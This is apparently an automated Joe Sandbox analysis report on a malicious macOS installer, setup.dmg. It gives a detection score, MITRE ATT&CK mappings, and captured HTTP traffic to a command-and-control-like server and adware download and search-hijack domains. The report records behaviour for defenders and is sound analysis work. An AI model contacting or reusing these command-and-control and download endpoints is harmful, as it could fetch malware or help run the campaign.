
Analysis Report setup.dmg

Overview

General Information

Joe Sandbox Version:25.0.0
Analysis ID:69635
Start date:14.02.2019
Start time:12:58:05
Joe Sandbox Product:Cloud
Overall analysis duration:0h 14m 3s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:setup.dmg
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal88.troj.spyw.evad.macDMG@0/49@46/0
Warnings:
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy:Threshold
Score:88
Range:0 - 100
Reporting:Report FP / FN
Whitelisted:false
Detection:malicious

Classification

Analysis Advice

Spawned process ReportCrash suggests that the sample has crashed or is trying to avoid analysis; try to read the dropped .crash file.



MITRE ATT&CK Matrix

Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise; Exploit Public-Facing Application
Execution: Scripting 11; Service Execution; Windows Management Instrumentation; Scheduled Task
Persistence: Hidden Files and Directories 11; Browser Extensions 1; Launch Daemon 2; Launch Agent 3
Privilege Escalation: Launch Daemon 2; Accessibility Features; Path Interception; DLL Search Order Hijacking
Defense Evasion: Hidden Files and Directories 11; Disabling Security Tools 1; Scripting 11; Obfuscated Files or Information
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files
Discovery: File and Directory Discovery 1; System Information Discovery 151; Query Registry; System Network Configuration Discovery
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Data Encrypted 1; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted
Command and Control: Uncommonly Used Port 2; Standard Non-Application Layer Protocol 5; Standard Application Layer Protocol 15; Multiband Communication

Signature Overview


Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.0.50:49283 -> 34.225.153.59:10000
Found C&C like URL pattern
Source: global traffic | HTTP traffic detected: POST /loadPE/checkPost.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Content-Length: 100 | Expect: 100-continue | Host: 34.225.153.59:10000 (3 occurrences)
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49283 -> 10000 (7 occurrences)
Source: unknown | Network traffic detected: HTTP traffic on port 10000 -> 49283 (7 occurrences)
Source: unknown | Network traffic detected: HTTP traffic on port 49285 -> 10000 (2 occurrences)
Source: unknown | Network traffic detected: HTTP traffic on port 49284 -> 10000 (2 occurrences)
Source: unknown | Network traffic detected: HTTP traffic on port 10000 -> 49284 (2 occurrences)
Source: unknown | Network traffic detected: HTTP traffic on port 10000 -> 49285 (2 occurrences)
Source: unknown | Network traffic detected: HTTP traffic on port 49286 -> 10000 (4 occurrences)
Source: unknown | Network traffic detected: HTTP traffic on port 10000 -> 49286 (8 occurrences)
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 34.225.153.59 (50 occurrences)
Connects to many different domains
Source: unknown | Network traffic detected: DNS query count 39
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: POST /loadPE/getOffers.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Content-Length: 809 | Expect: 100-continue | Connection: keep-alive | Host: 34.225.153.59:10000
Source: global traffic | HTTP traffic detected: GET /download/mcwnet HTTP/1.1 | Connection: keep-alive | Host: install.osxappdownload.com
Source: global traffic | HTTP traffic detected: POST /loadPE/checkPost.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Content-Length: 100 | Expect: 100-continue | Host: 34.225.153.59:10000 (3 occurrences)
Source: global traffic | HTTP traffic detected: GET /erq/chs?cid=3gggkfl1b0pp5pt5sadh&f=setup HTTP/1.1 | Connection: keep-alive | Host: www.pintaj.pw
Source: global traffic | HTTP traffic detected: GET /cf/oq?cid=3gggkfl1b0pp5pt5sadh&f=setup&uu=lIaJhrzOpHZ6hXV2eXqMfXp6gXc= HTTP/1.1 | Connection: keep-alive | Host: tusak.rached.space
Source: global traffic | HTTP traffic detected: GET /mmecw/qqvdwx?cid=3gggkfl1b0pp5pt5sadh&f=setup&pvhid=36264242-8135-4590-9915-e3e977081c0c HTTP/1.1 | Connection: keep-alive | Host: www.rached.space
Source: global traffic | HTTP traffic detected: GET /download/downloaddm?com=df68d247-e9f2-42fa-b681-f63a4bb6ab50&=&f=setup&cifd=3gggkfl1b0pp5pt5sadh&sidw=df68d247-e9f2-42fa-b681-f63a4bb6ab50 HTTP/1.1 | Connection: keep-alive | Host: www.oplurb.space
Downloads compressed data via HTTP
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Cache-Control: private, max-age=0 | Content-Type: text/xml; charset=utf-8 | Content-Encoding: gzip | Vary: Accept-Encoding | Server: Microsoft-IIS/7.5 | X-AspNet-Version: 4.0.30319 | X-Powered-By: ASP.NET | Date: Thu, 14 Feb 2019 11:59:48 GMT | Content-Length: 263 | Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff 1e ef 16 65 7a 99 d7 4d 51 2d 3f fb 68 77 bc f3 51 9a 2f a7 d5 ac 58 5e 7c f6 d1 ba 3d df 3e f8 e8 f7 38 fa 8d 93 c7 4d 5b d3 47 29 b5 5e 36 9f 7d 34 6f db d5 a3 bb 77 db 7c b1 c2 ff d7 75 31 ae ea 8b bb 1f 1d ed 1e dc 1f ef 1e 3c 1c ef de df 19 3f d8 1b 9d 7c 7b f4 fa aa 68 7f 90 d7 65 b6 9c 8d e8 d9 7f 30 de dd df 3f 78 f8 60 ff d3 9d 87 f7 1e dc 1f 1d 50 db fb bb 3b f7 ef 3f dc 39 d8 db b9 b7 3b da a1
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Cache-Control: private, max-age=0 | Content-Type: text/xml; charset=utf-8 | Content-Encoding: gzip | Vary: Accept-Encoding | Server: Microsoft-IIS/7.5 | X-AspNet-Version: 4.0.30319 | X-Powered-By: ASP.NET | Date: Thu, 14 Feb 2019 12:00:11 GMT | Content-Length: 263 | Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff 1e ef 16 65 7a 99 d7 4d 51 2d 3f fb 68 77 bc f3 51 9a 2f a7 d5 ac 58 5e 7c f6 d1 ba 3d df 3e f8 e8 f7 38 fa 8d 93 c7 4d 5b d3 47 29 b5 5e 36 9f 7d 34 6f db d5 a3 bb 77 db 7c b1 c2 ff d7 75 31 ae ea 8b bb 1f 1d ed 1e dc 1f ef 1e 3c 1c ef de df 19 3f d8 1b 9d 7c 7b f4 fa aa 68 7f 90 d7 65 b6 9c 8d e8 d9 7f 30 de dd df 3f 78 f8 60 ff d3 9d 87 f7 1e dc 1f 1d 50 db fb bb 3b f7 ef 3f dc 39 d8 db b9 b7 3b da a1
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Cache-Control: max-age=259200 | Content-Type: application/javascript | Content-Encoding: gzip | Last-Modified: Tue, 29 Jan 2019 13:21:57 GMT | Accept-Ranges: bytes | ETag: "80c8c69bd5b7d41:0" | Vary: Accept-Encoding | Request-Context: appId=cid-v1:da449687-a631-4767-82ce-2a5d944140bb | Date: Thu, 14 Feb 2019 12:00:13 GMT | Content-Length: 1314 | Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ac 57 ef 4e e3 46 10 ff 8e c4 3b 18 ab 0a b6 e2 73 e0 e8 a9 12 ee ea 14 41 ae 45 ba 83 13 a0 aa 15 47 23 63 4f 9c e5 1c 3b da dd 10 50 92 27 eb 87 3e 52 5f a1 b3 b3 6b c7 f9 03 dc 07 3e 40 b2 b3 f3 7f 7e 33 3b d9 dd f9 ef 9f 7f 77 77 f8 c0 73 d3 32 99 8c a0 50 2e 2f 1c 09 f9 c0 9f 21 75 cf 73 93 3c 96 f2 33 97 74 51 31 85 89 80 58 41 2f 07 7d f2 dc be eb fb f3 f9 f6 db f3 ab 56 eb c7 f4 9c 5f 79 ee 50 a9 f1 71 a7 33 9d 4e c3 e9 51 58 8a ac f3 fe e0 e0 a0 23 1f 32 37 70 33 34 e3 cf bc c1 a4 48 14 2f 0b ef 81 c3 d4 9f b9 13 09 8e 54 82 27 ca 8d c8 e9 7d ab 70 1f 4d 11 8f 2f 40 4d 44 11 3d c4 62 77 a7 f6 e4 ab 28 c7 ac e1 58
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Cache-Control: max-age=259200 | Content-Type: application/javascript | Content-Encoding: gzip | Last-Modified: Tue, 29 Jan 2019 13:21:57 GMT | Accept-Ranges: bytes | ETag: "80c8c69bd5b7d41:0" | Vary: Accept-Encoding | Request-Context: appId=cid-v1:da449687-a631-4767-82ce-2a5d944140bb | Date: Thu, 14 Feb 2019 12:00:13 GMT | Content-Length: 7593 | Data Raw: 1f 8b 08 00 00 00 00 00 04 00 dc 7d db 72 dc 46 92 e8 bb 22 fc 0f 4d 48 d1 00 d4 60 5f 64 cb b2 bb 55 62 48 94 3c e6 19 51 d2 88 f4 28 bc 24 87 81 6e 54 77 63 84 06 5a 00 9a 17 93 7c dd e7 8d fd 92 7d df 87 8d d8 4f d9 1f d8 5f d8 cc ac 0b 0a 97 e6 cd f6 78 e2 4c 84 a9 46 55 66 55 56 56 56 56 66 56 56 cd 57 0f fe f7 3f ff eb ab 07 d3 55 3c c9 c3 24 6e c5 fe 49 38 f3 73 be 9f fc 94 46 ce 2a 8d dc 8b 13 3f 6d 4d 59 90 4c 56 0b 1e e7 dd 49 ca a1 fe 4d c4 f1 cb b1 7e 78 ff 71 d7 72 47 d3 ae 4f 0d 30 40 19 69 d8 71 12 9c 77 fd e5 92 c7 c1 f6 3c 8c 02 67 8a 90 d9 6a bc 08 73 c7 1d 5d 7d f5 00 1b 0f f8 78 35 db 4d 02 ce a6 7e 94 f1 11 96 4d a2 70 f2 f9 78 92
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Cache-Control: max-age=259200 | Content-Type: application/javascript | Content-Encoding: gzip | Last-Modified: Tue, 29 Jan 2019 13:21:57 GMT | Accept-Ranges: bytes | ETag: "80c8c69bd5b7d41:0" | Vary: Accept-Encoding | Request-Context: appId=cid-v1:da449687-a631-4767-82ce-2a5d944140bb | Date: Thu, 14 Feb 2019 12:00:13 GMT | Content-Length: 2494 | Data Raw: 1f 8b 08 00 00 00 00 00 04 00 c4 59 6d 73 db b8 11 fe 9e 99 fc 07 85 d1 88 e4 99 a2 45 bf 24 b6 64 c8 93 fa 3a d3 4c af ed f5 92 4e 3f d8 ee 0d 4c 42 12 6c 8a e4 11 a0 5f 2a f9 bf 77 01 10 22 40 49 96 d3 5e a6 77 e3 88 c4 02 8b 7d 79 76 b1 0b be 7d 13 e7 19 e3 9d 4f 15 cf 2f f2 79 91 12 4e 50 46 1e 3a 93 2a 8b 39 cd 33 cf 5f c0 58 e7 57 3e a3 0c 89 7f 46 f2 b5 28 f3 7b 9a 90 12 39 d3 3c 9f a6 c4 d1 c3 e4 1e 39 ce 48 4e 0f 69 46 39 5a 31 ea 32 82 cb 78 f6 39 2b 2a 1e d4 2f 17 79 c6 31 cd 48 19 d4 ef 38 4d 6f 70 7c 17 68 fe fe e2 81 66 49 fe 10 4e d3 fc 06 a7 5f 78 5e 12 b4 3e b4 5c 2e 9e 47 8d 50 fa 61 b9 5c 8d 8d 94 9e dd 07 9a 4c 09 5f ed 8b ba 9e 73
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Cache-Control: max-age=259200 | Content-Type: application/javascript | Content-Encoding: gzip | Last-Modified: Tue, 15 May 2018 11:51:18 GMT | Accept-Ranges: bytes | ETag: "0ffe3843ecd31:0" | Vary: Accept-Encoding | Request-Context: appId=cid-v1:da449687-a631-4767-82ce-2a5d944140bb | Date: Thu, 14 Feb 2019 12:00:13 GMT | Content-Length: 14955 | Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec 7d 69 73 db 48 96 e0 e7 e9 88 fe 0f 10 a2 a7 0b 2c 93 34 a9 c3 2e 8b ed 72 cb b6 7c 74 4b 96 4a 52 79 aa 86 d6 28 00 10 14 21 53 24 9b 04 7d 94 47 bf 6c 3f ec 4f da bf b0 ef c8 1b 09 90 72 c9 bd d3 11 5b d3 63 11 79 e7 cb 97 ef ca 97 2f ff cf ff fa df f7 bf df f8 e3 1f be 0f fe 3a ce d3 6c b2 c8 82 e3 79 36 9e c6 83 bf 9d 62 ea db 7c 91 17 c1 a8 28 66 bb f7 ef a7 f3 2c 2e b2 ab 45 3b 9d 5e df 0f 86 d3 79 30 98 a6 cb eb 6c 52 c4 45 3e 9d 34 83 e5 6c 00 05 16 41 3c 19 04 d9 a7 f8 7a 36 ce 16 6d 68 06 5b 7a 36 9d 7d 9e e7 97 a3 22 88 d2 46 b0 d9 e9 76 5b f0 cf 4e 70 b9 78 9f 4f 26 d9 1c 1b 6d 06 f9 24 95 15 9e e7 8b 62 9e 2
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Cache-Control: private, max-age=0, no-cache | Pragma: no-cache | Content-Type: text/javascript; charset=utf-8 | Content-Encoding: gzip | Expires: Mon, 26 Jul 1997 05:00:00 GMT | Vary: Accept-Encoding | Server: Microsoft-IIS/10.0 | Access-Control-Allow-Origin: * | P3P: CP='CUR ADM OUR NOR STA NID' | X-Powered-By: ASP.NET | Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept | Access-Control-Allow-Methods: GET, POST, OPTIONS | Access-Control-Allow-Credentials: true | Access-Control-Max-Age: 1000 | Date: Thu, 14 Feb 2019 12:00:14 GMT | Content-Length: 1200 | Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 fe c7 bf f7 1f dc 3a 5f 2f a7 6d 51 2d b7 ee fc e2 df 38 b9 cc ea b4 49 3f 4b 3f 7a fc d1 27 1f cd 8
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /loadPE//ListOffers.php HTTP/1.1 | Host: 34.225.153.59:10000 | Upgrade-Insecure-Requests: 1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Accept-Encoding: gzip, deflate | Connection: keep-alive
Source: global traffic | HTTP traffic detected: GET /loadPE//bootstrap/js/bootstrap.min.js HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: */* | Connection: keep-alive | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Referer: http://34.225.153.59:10000/loadPE//ListOffers.php | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /loadPE//bootstrap/css/bootstrap.min.css HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: text/css,*/*;q=0.1 | Connection: keep-alive | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Referer: http://34.225.153.59:10000/loadPE//ListOffers.php | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /loadPE//JavaScript/jquery.min.js HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: */* | Connection: keep-alive | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Referer: http://34.225.153.59:10000/loadPE//ListOffers.php | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /loadPE//Image/sideboard.png HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5 | Connection: keep-alive | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Referer: http://34.225.153.59:10000/loadPE//ListOffers.php | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /loadPE/LastPage.html HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Upgrade-Insecure-Requests: 1 | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Accept-Encoding: gzip, deflate | Connection: keep-alive
Source: global traffic | HTTP traffic detected: GET /loadPE/JavaScript/jquery.min.js HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: */* | Connection: keep-alive | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Referer: http://34.225.153.59:10000/loadPE/LastPage.html | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /loadPE/CSS/MacStyle.css HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: text/css,*/*;q=0.1 | Connection: keep-alive | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Referer: http://34.225.153.59:10000/loadPE/LastPage.html | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /loadPE/Image/installing.gif HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5 | Connection: keep-alive | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Referer: http://34.225.153.59:10000/loadPE/LastPage.html | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /download/mcwnet HTTP/1.1 | Connection: keep-alive | Host: install.osxappdownload.com
Source: global traffic | HTTP traffic detected: GET /loadPE/Image/loading.gif HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5 | Connection: keep-alive | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Referer: http://34.225.153.59:10000/loadPE/LastPage.html | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /loadPE/Image/clean.png HTTP/1.1 | Host: 34.225.153.59:10000 | Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5 | Connection: keep-alive | Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMlwiOjE1NTAxNDU1NjZ9LFwidGltZVwiOjE1NTAxNDU1NjZ9In0.KmGO_kmjL1a7NGYfAZEtR0CtNdS9mDg-LzDrIMRpAhM | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) | Accept-Language: en-us | Referer: http://34.225.153.59:10000/loadPE/LastPage.html | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /erq/chs?cid=3gggkfl1b0pp5pt5sadh&f=setup HTTP/1.1 | Connection: keep-alive | Host: www.pintaj.pw
Source: global traffic | HTTP traffic detected: GET /cf/oq?cid=3gggkfl1b0pp5pt5sadh&f=setup&uu=lIaJhrzOpHZ6hXV2eXqMfXp6gXc= HTTP/1.1 | Connection: keep-alive | Host: tusak.rached.space
Source: global traffic | HTTP traffic detected: GET /mmecw/qqvdwx?cid=3gggkfl1b0pp5pt5sadh&f=setup&pvhid=36264242-8135-4590-9915-e3e977081c0c HTTP/1.1 | Connection: keep-alive | Host: www.rached.space
Source: global traffic | HTTP traffic detected: GET /download/downloaddm?com=df68d247-e9f2-42fa-b681-f63a4bb6ab50&=&f=setup&cifd=3gggkfl1b0pp5pt5sadh&sidw=df68d247-e9f2-42fa-b681-f63a4bb6ab50 HTTP/1.1 | Connection: keep-alive | Host: www.oplurb.space
Source: global traffic | HTTP traffic detected: GET /MaxMind.asmx/GetGeoInfo HTTP/1.1 | Host: cloud-search.linkury.com | Accept: */* | Accept-Language: en-us | Connection: keep-alive | Accept-Encoding: gzip, deflate | User-Agent: macsearch/1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic | HTTP traffic detected: GET /StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=mcwnet HTTP/1.1 | Host: svc-stats.linkury.com | Accept: */* | Accept-Language: en-us | Connection: keep-alive | Accept-Encoding: gzip, deflate | User-Agent: macsearch/1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic | HTTP traffic detected: GET /tpmac.html?_publisher=mcwnet&_barcodeid=52413004&_deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c&_installDate=14-02-2019 HTTP/1.1 | Host: search.tapufind.com | Upgrade-Insecure-Requests: 1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Accept-Encoding: gzip, deflate | Connection: keep-alive
Source: global traffic | HTTP traffic detected: GET /MaxMind.asmx/GetGeoInfo HTTP/1.1 | Host: madmax.macapproduct.com | Accept: */* | Accept-Language: en-us | Connection: keep-alive | Accept-Encoding: gzip, deflate | User-Agent: tapufind (unknown version) CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global traffic | HTTP traffic detected: GET /tpmac.html?q= HTTP/1.1 | Host: search.tapufind.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Upgrade-Insecure-Requests: 1 | Cookie: _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnet; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4enlF-6wdoQlc-OolePTLz-gpC4fFENArXjXOKtxlSolwZzKvztNbvkqXoIQzwLhtCZ01IeMYZE8p3MokiKZQ25VtmqQ7xMDUGu5xssIVE-2pe89knPY0TNfSSALHPXIbkjNFqbePLX5bkr7M5Cz6jzaQ7It7cho, | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Accept-Encoding: gzip, deflate | Connection: keep-alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: feed.tapufind.com | Upgrade-Insecure-Requests: 1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Accept-Encoding: gzip, deflate | Connection: keep-alive
Source: global traffic | HTTP traffic detected: GET /?publisher=tapufindsf&feedid=infospace&dpid=yhs&hsimp=yhs-newtab&userid=syn_d955cead-824c-4550-9e89-02e36ed3c263&co=CH&type=YHS_TAPHP_100 HTTP/1.1 | Host: search.tapufind.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Upgrade-Insecure-Requests: 1 | Cookie: _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnet; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4enlF-6wdoQlc-OolePTLz-gpC4fFENArXjXOKtxlSolwZzKvztNbvkqXoIQzwLhtCZ01IeMYZE8p3MokiKZQ25VtmqQ7xMDUGu5xssIVE-2pe89knPY0TNfSSALHPXIbkjNFqbePLX5bkr7M5Cz6jzaQ7It7cho, | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7 | Accept-Language: en-us | Accept-Encoding: gzip, deflate | Connection: keep-alive
